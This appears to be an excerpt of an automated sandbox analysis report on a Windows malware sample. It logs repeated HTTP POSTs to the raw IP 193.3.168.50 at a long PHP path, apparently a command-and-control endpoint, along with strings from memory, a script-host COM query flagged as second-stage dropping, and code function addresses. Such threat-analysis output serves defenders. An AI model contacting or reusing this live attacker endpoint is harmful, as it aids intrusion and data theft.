                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003790000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003D00000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000036DD000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.3.168.50
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData
                                  Source: svchost.exe, 00000012.00000002.2910150411.00000181EF800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6C8000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: edb.log.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                  Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6C8000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6C8000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6FD000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                  Source: qmgr.db.18.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: chainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                  Source: powershell.exe, 00000008.00000002.1829367283.000001D7001C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                  Source: powershell.exe, 00000008.00000002.1831461508.000001D700585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.AppV.
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                  Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                  Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                  Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                  Source: edb.log.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                  System Summary

                                  barindex
                                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E36FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00E36FAA
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3848E0_2_00E3848E
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E340FE0_2_00E340FE
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E400B70_2_00E400B7
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E440880_2_00E44088
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E551C90_2_00E551C9
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E471530_2_00E47153
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E332F70_2_00E332F7
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E462CA0_2_00E462CA
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E443BF0_2_00E443BF
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3F4610_2_00E3F461
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5D4400_2_00E5D440
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3C4260_2_00E3C426
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E477EF0_2_00E477EF
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5D8EE0_2_00E5D8EE
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3286B0_2_00E3286B
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E619F40_2_00E619F4
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3E9B70_2_00E3E9B7
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E46CDC0_2_00E46CDC
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E43E0B0_2_00E43E0B
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3EFE20_2_00E3EFE2
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54F9A0_2_00E54F9A
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeCode function: 4_2_00007FFD9B780DA74_2_00007FFD9B780DA7
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeCode function: 4_2_00007FFD9B93028A4_2_00007FFD9B93028A
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeCode function: 4_2_00007FFD9B9449FA4_2_00007FFD9B9449FA
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B79B60D14_2_00007FFD9B79B60D
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B79CB5914_2_00007FFD9B79CB59
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B79CFDD14_2_00007FFD9B79CFDD
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B79CD8214_2_00007FFD9B79CD82
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B79CD3514_2_00007FFD9B79CD35
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B7CA00014_2_00007FFD9B7CA000
